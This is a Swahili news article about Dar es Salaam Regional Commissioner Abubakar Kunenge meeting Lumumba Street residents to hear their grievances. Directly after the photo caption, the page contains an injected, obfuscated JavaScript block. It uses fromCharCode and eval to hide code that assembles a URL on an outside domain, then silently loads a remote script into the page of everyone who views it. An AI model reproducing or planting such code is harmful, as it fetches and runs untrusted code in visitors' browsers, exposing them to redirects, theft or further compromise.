Recent Comments

RC DSM kuwafuata wananchi kutatua kero

By Juma Issihaka Sep 18, 2020
<p>Mkuu wa Mkoa wa Dar es Salaam, Abubakar Kunenge</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

MKUU wa Mkoa wa Dar es Salaam, Abubakar Kunenge, ameeleza siri ya kuwafuata wananchi katika utendaji wake, ni kubaini kero na changamoto za moja kwa moja zinazowakabili bila kuchunjwa.

Hayo ameyasema jana alipozungumza na Uhuru, baada ya kuongea na wananchi wa Mtaa wa Lumumba jijini humo.

Amesema wananchi ndio waajiri wake, ni vyema kuzungumza nao ili kujua kero zao, pia kufanya hivyo kunamsaidia kupata taarifa sahihi za changamoto hizo.

“Wananchi ndio waajiri wetu, kubwa ni kwamba kuzungumza nao ndio kujua changamoto zao, taarifa za moja kwa moja za wananchi hazichujwi unazipata katika uhalisia wake, na kujua namna ya kuzifanyia kazi, pia ni vizuri wananchi wakafahamu viongozi wao,” amesema.

Amesema hata Rais Dk. John Magufuli, baada ya kuteua viongozi amekuwa akiwaagiza kukutana na wananchi ili kutatua kero zao, hivyo utendaji wake ni sehemu ya utekelezaji wa agizo hilo.

“Tunapokutana nao wanazungumza wazi bila uoga, kwamba maeneo gani tunafanya vizuri na yepi tunatakiwa tuboreshe, nisipokaa nao au nikiwaogopa uhalali wangu wa kuwa kiongozi haupo tena,” amesema.

Kadhalika Kunenge amesema utendaji wa kiongozi sio kusikika kupitia vyombo vya habari pekee, badala yake inatakiwa kutatua changamoto za jamii kwa kuifikia ilipo.

Akijibu hoja za wananchi kuhusu uwezekano wa kuwapatia mikopo ya mtu mmoja mmoja kwa wenye ulemavu, Kunenge ameeleza serikali jijini humo, inafahamu na inafikiria uwezekano wa kufanikisha hilo.

Kuhusu kufikisha huduma ya umeme kwa maeneo ya pembezoni mwa jiji hilo, Kunenge amewataka wananchi kuwa na subira kwani mradi wa usambazaji umeme katika maeneo hayo unafanyika kwa awamu.

Chande Kihalile, mkazi wa Kitunda jijini humo, amesema utendaji huo unagusa maslahi ya wananchi kwani mara kadhaa wamekuwa wakikosa nafasi za kukutana na viongozi kueleza kero zao.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.